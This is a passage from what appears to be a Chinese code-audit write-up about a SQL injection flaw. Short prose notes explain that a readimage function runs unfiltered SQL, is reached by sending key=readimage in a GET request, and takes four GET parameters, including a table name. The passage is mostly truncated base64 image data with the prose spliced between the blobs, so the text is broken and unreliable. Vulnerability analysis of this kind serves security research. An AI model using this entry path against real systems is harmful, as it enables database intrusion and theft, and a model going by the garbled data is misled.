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
如上如可发现接收参数很多且我们通过分析发现readimage函数存在SQL执行语句看样子没有然和过滤限制等问题</p>
<p><a id=img10 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182142-9bf9f546-87ba-1.png><img src="data:image/png;base64,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
我们再回头来看imagefield文件发现如果要进入readimage逻辑进行处理需要strKey等于readimage那么我们可以发现strKey为key字段且通过GET请求进行传参处理</p>
<p><a id=img11 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182204-a962d81a-87ba-1.png><img src="data:image/png;base64,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
且通过上述分析readimage函数中的SQL语句可以知道需要四个参数并且该四个参数都可以通过GET请求传参但是其中有一个问题就是sTablename需要指定表名不过一般数据库都有自带的表名和数据库名因此也不算啥大问题</p>
<p><a id=img12 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182512-1964a9c2-87bb-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACbUAAAH2CAYAAABNpfNaAAEAAElEQVR4nOzdZ3Rcx53n/W91ABo5AwRIECBIMIA5Z2XKkhWtZDnIsq2Rx+tJmjyz413vBD8znrCzzlEOY9njIFuWZWWREjMpUmIGEwgGkMgAidAInep5AZDITN1gN8jf5xyc0+gbqm6oqnv7/m+Vmb9wsSUCppQUA1BeXh6J1V2XkpOTAWhvb49yTkREREREREREREREREREIqukpASAysrKKOdERERExjpHtDMgIiIiIiIiIiIiIiIiIiIiIiIicp6C2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNREREREREREREREREREREREREYoaC2kRERERERERERERERERERERERCRmKKhNJMZZ68STkk1mTj4pHhPt7IiIiIiIiIiIiIiIiIiIiIiIjCpXtDMgIsOznmIW3f0hlsybSk5ST1E9/sIz/HizN8o5ExEREREREREREREREREREREZPQpqE4lB1lnMbZ/9C1ZPiI92VkRERERERERERERERERERERErikFtYnEoPiF97FsfBzWdlC1/jle27Cf+pYOQkbDj4qIiIiIiIiIiIiIiIiIiIjI9U1BbRJTbJ6L7y52EIfludd8vBW4MYO4CiYU4jYG27iZ1196l1pjQAFtIiIiIiIiIiIiIiIiIiIiInIDcEQ7AyIylMPh7PnQ0UZ7dLMiIiIiIiIiIiIiIiIiIiIiInJNXXZPbVNKii9rvrKysotOLy8vv9wkRW5YnV1dQCp4EvAAbdHOkIiIiIiIiIiIiIiIiIiIiIjINaKe2kRiUFdnZ88HTyIJ0c2KiIiIiIiIiIiIiIiIiIiIiMg1ddk9tZ13tT2tXaoHN7kxZU928x9lw8VWGp6428MTg74N1fj51M7QgO+sx8H/ucPFJCy/Xufjd9bBB6c6WZVjyIoz+Lotx2pDvHA4wPGAGbDspBlu/s8UBzYU5Gfr/LzWOXD6ealFLv7fbAcOLL9a5+OljuHni5SurvNBbQkKahMRERERERERERERERERERGRG4p6apPrS7yT31/p4tGJTvITHMQ5DcmJDuaWuPifq13MctkBs1eeDHLSWozDyfLxwxcHaw3LxhucxkBLiK3e0d+M7u7ung+uuCuPPBURERERERERERERERERERERGcMULyNRdbYqwN839Psi28XflhnchHh1W5AdvoHz20AIGLmXtOIpTmaFLC/u8nOg1eJKcDBvsoM7Mg1xyS6emm75i31BgqZ3HV7LpmYoyoKiQgeFRwNUmUHrj3ewJMNgraXiTIjGwdNHgcfj6c1fK+2jnpqIiIiIiIiIiIiIiIiIiIiISOxQUJtEVdBnqewXuGYTLBYDGJrOhagMDA4gGzmgzBgHC9KC/L+3/ewO9s7XGmR/bYBzq+J5LBMyJjiYvS/I7gvLWDaeCvFIpoO4JAerM+GnZweuN3OCg8kGsJZ3T188qC5cxpFAStFCbl9ZirUhmt7bxKlRS01EREREREREREREREREREREJPYoqE2uKydPBPsC2noZY3jteIiHMhw4XYaJSbC7o296x5kQu8ocLIt3sHSCk581Bwn19sZmrWV5vsFhDMGmANu6iWhMm7W53PLn/8TNBabfd0F87fWc2Pgiv321EnsNeoYTEREREREREREREREREREREYkVjmhnQCRSrLXUtoWGnRbwWpp7Pye5B00MBXmnuudjWr6D2f1LRaKTJRk96z5UbWm9JgFmQQKd7bQ2N9ERuAbJiYiIiIiIiIiIiIiIiIiIiIjEkKvuqa2srOyy5isvL7/aJESukKU7OMKk9hA/3GlJxFLrHTjJGEP5ySC1xU7y4hysHgd7anqm5Y53UgwQCrH9zGgMPdrEuz/8Agd6S6JxJpBavJRb7rqVOQ/8GcnBL/CTrc0XX4WIiIiIiIiIiIiIiIiIiIiIyHVEw4/KDcEELQdq7fn/hs7QGmJTi5NH0g1zCl0kVAfowMHyfIMxBl9jiHf9wy8aVr5MkM7mGjr7fddQU0lLylQ+d+cESlbeRPaWF2jUEKQiIiIiIiIiIiIiIiIiIiIicoO46qA29cAm1xNjLBtOhfhQmoO4HMPyOFjrNixK6xl6dN9pS+c1DCxrPtcMTIDsPLKBxmuWsoiIiIiIiIiIiIiIiIiIiIhIdDminQGRWHHuTIh9AcAYFhVA9jgHRcZAMMS7daFrmpcL4XPGifOapiwiIiIiIiIiIiIiIiIiIiIiEl0KahM5zx9kQ63FGAelOU7mZPUUj67aEDsD1zYrCQmJPR+6O+m6tkmLiIiIiIiIiIiIiIiIiIiIiETVFQe1OZ1X3m/U1SwjN6gg+Hs/JsZd26SNMew6ZTlrLe5UBwtTeoYe3X0mSOAaDj0KkOBJ6PnQ1UnnNU1ZRERERERERERERERERERERCS6rjioraio6IqC1JxOJ0VFRVeajNyoWiynLBjj4PbZLpZmGUpS+/7Gue2oJh9sCrKlHUySk9lJBnwhtjaOapLD8ng8PR+6O+m+9smLiIiIiIiIiIiIiIiIiIiIiESN63JnPH2mmtzcHDweD0VFRZw8eZJgMHjRZc4HtHk8Hrq7u6murg47w3Kd8wV48biDaSWQnuvic7kDJ5fv7eJLJ0cveWMsb1dZ7p4BDmNoqw2yLwhc247aiIuL7/ng9+G7tkmLiIiIiIiIiIiIiIiIiIiIiETVZffU1tXt40x1Ld0+34XAtov12NY/oK2rq4sTJ07Q2amBFOXijDEcPBDgX8tDHG63dIdGt2e24TS1WTrpGXr0/eoQoWs89ChAZ2dHz4eMPHI0eq+IiIiIiIiIiIiIiIiIiIiI3EAuu6c2gGAwSHVNHQX5eRftsW1wQNvl9Oomcp4xlkOVAf6/ymGnDv2mK8Tf/8434vQrYa1lbr6DJGOwnQG2NIS9yqtSe+Qw7TfnkJS8jA8+2cjbmw5Q39JFV2stbV3XPtBPRERERERE
<p><a id=img13 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182516-1bd0ca74-87bb-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACg8AAAKFCAYAAADxzetZAAEAAElEQVR4nOzdd3wcx33//9fcHQ536L0RIBp7E3sRSVWSVrWqbbnIsmzLcZzkG+Xrb+wU++c4iRMrTnNJ3C3HNXZcIktWJyWxib0T7GAB0Xtvdze/PwCSKAcQxB0IUHg/H+JDh9ub3ZnZ2dnb3c/NmEVLlllkwppWkAdAUVHR+GbkBmNtGrd9+u+5Nctcec9fxZ4f/AMvnWgdx5yJiIiIiIiIiIiIiIiIiIxcQUEBAMXFxeOcExEREXmncY13BkTGkvX76Gqvo/rsIfZuep6DJW3jnSUREREREREREREREREREREREZFxp+BBeUcypoq3/vUTvDXeGREREREREREREREREREREREREZmAHOOdARERERERERERERERERERERERERG5vhQ8KCIiIiIiIiIiIiIiIiIiIiIiIjLJKHhQREREREREREREREREREREREREZJJR8KCIiIiIiIiIiIiIiIiIiIiIiIjIJKPgQREREREREREREREREREREREREZFJRsGDIiIiIiIiIiIiIiIiIiIiIiIiIpOMggdFREREREREREREREREREREREREJhkFD4qIiIiIiIiIiIiIiIiIiIiIiIhMMgoeFBEREREREREREREREREREREREZlkFDwoIiIiIiIiIiIiIiIiIiIiIiIiMskoeFBERERERERERERERERERERERERkklHwoIiIiIiIiIiIiIiIiIiIiIiIiMgko+BBERERERERERERERERERERERERkUlGwYMiIiIiIiIiIiIiIiIiIiIiIiIik4yCB0VEREREREREREREREREREREREQmGQUPioiIiIiIiIiIiIiIiIiIiIiIiEwyCh4UERERERERERERERERERERERERmWQUPCgiIiIiIiIiIiIiIiIiIiIiIiIyySh4UERERERERERERERERERERERERGSSUfCgiIiIiIiIiIiIiIiIiIiIiIiIyCTjGmqBNZHEp6SSlBBHlCcCJwG6u9ppa6qnurKG9oAJni7gICopndSUBKK9EbgM+DrbaWuup6aqhlbfmJVFREREREREREREREREREREREREREYgaPCgdcaRMy2PZK+zz7sOIr2xRHpjSUiIpeT0Oeq7B6QjgqT86eQkuDHmSnCh2xuD2xtDXGI8ZafOUNs1FkURERERERERERERERERERERERERkZEYFDxoAy5SCnoCBwPdzdSUllHb0o4v4CQyNpWs7HRiIhPJymmh+XQ1PseVIMHI1FyyE9xgu2muvEhZbTMdfgeemCQypmQSHxlHVl46Lccr6HQEH7lQRERERERERERERERERERERERERMaWY9A73hSSYx1Y20FN8RnKG9ro8lkCAR/tjeWcu1BLl7U4YxNJcF9JZgMeEpNiMEBH9TmKyxro6A5AwEdHUxXniitpsxbjTSE55voVUERERERERERERERERERERERERET6GxQ8aLweXH4/vvYG6lsDgxL4mptoswBePJ6+a/Lg9QB00dzQAgNGFrTt9TS1gzFuvFFBZ0sWERERERERERERERERERERERERketgcBRfwzmKGnpfDzu1sO3/p8PVG4nYRVcX2ICTpPyZZEV1UHHmDDUdnXR2AVHgcLoAfxiyLyIiIiIiIiIiIiIiIiIiIiIiIiLXavC0xVfj9uA2AJ10dPZf1BNqaHvjC